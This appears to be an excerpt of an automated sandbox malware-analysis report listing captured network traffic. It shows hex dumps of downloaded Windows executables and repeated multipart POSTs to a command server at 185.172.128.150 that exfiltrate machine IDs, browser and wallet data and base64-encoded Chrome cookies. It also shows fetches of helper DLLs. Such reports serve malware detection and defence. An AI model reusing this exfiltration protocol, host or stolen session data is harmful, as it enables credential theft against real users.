00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIIJDGHCBFIECBKEGHHost: 185.172.128.150Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 36 45 31 33 34 35 34 44 41 36 38 39 34 36 31 37 39 39 38 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 2d 2d 0d 0a Data Ascii: ------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="hwid"E86E13454DA6894617998------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="build"default100------BGHIIJDGHCBFIECBKEGH--
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAEHJJECAEGCAAAAEGIHost: 185.172.128.150Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 2d 2d 0d 0a Data Ascii: ------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="message"browsers------JDAEHJJECAEGCAAAAEGI--
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGCHost: 185.172.128.150Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 2d 2d 0d 0a Data Ascii: ------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="message"plugins------KEGDBFIJKEBGIDGDHCGC--
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKKFBAEGDHJJJJKFBKFHost: 185.172.128.150Content-Length: 6611Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/sqlite3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBKKEBKEBFCAAAEGDHHost: 185.172.128.150Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 4b 4b 45 42 4b 45 42 46 43 41 41 41 45 47 44 48 2d 2d 0d 0a Data Ascii: ------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KECBKKEBKEBFCAAAEGDHContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGIHost: 185.172.128.150Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 2d 2d 0d 0a Data Ascii: ------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="file"------JEBKJDAFHJDGDHJKKEGI--
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.172.128.150Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="file"------BGDAAEHDHIIJKECBKEBA--
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/msvcp140.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/nss3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/softokn3.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b7d0cfdb1d966bdd/vcruntime140.dll HTTP/1.1Host: 185.172.128.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIIJDGHCBFIECBKEGHHost: 185.172.128.150Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCAKKEGCAAFHJJJDBKJHost: 185.172.128.150Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 2d 2d 0d 0a Data Ascii: ------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="message"wallets------GHCAKKEGCAAFHJJJDBKJ--
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.172.128.150Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 31 35 35 64 62 31 37 34 64 33 64 35 62 63 65 32 37 39 65 63 65 66 62 65 39 31 39 36 64 62 33 34 65 35 64 33 32 65 33 64 34 32 32 34 39 36 62 32 66 38 36 30 34 64 65 36 34 61 37 61 30 32 61 66 62 36 32 34 63 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"f1155db174d3d5bce279ecefbe9196db34e5d32e3d422496b2f8604de64a7a02afb624c0------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="message"files------BGDAAEHDHIIJKECBKEBA--
Source: global traffic	HTTP traffic detected: POST /c698e1bc8a2f5e6d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKFIJEGCAAFHJKFCFCHost: 185.172.128.150Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
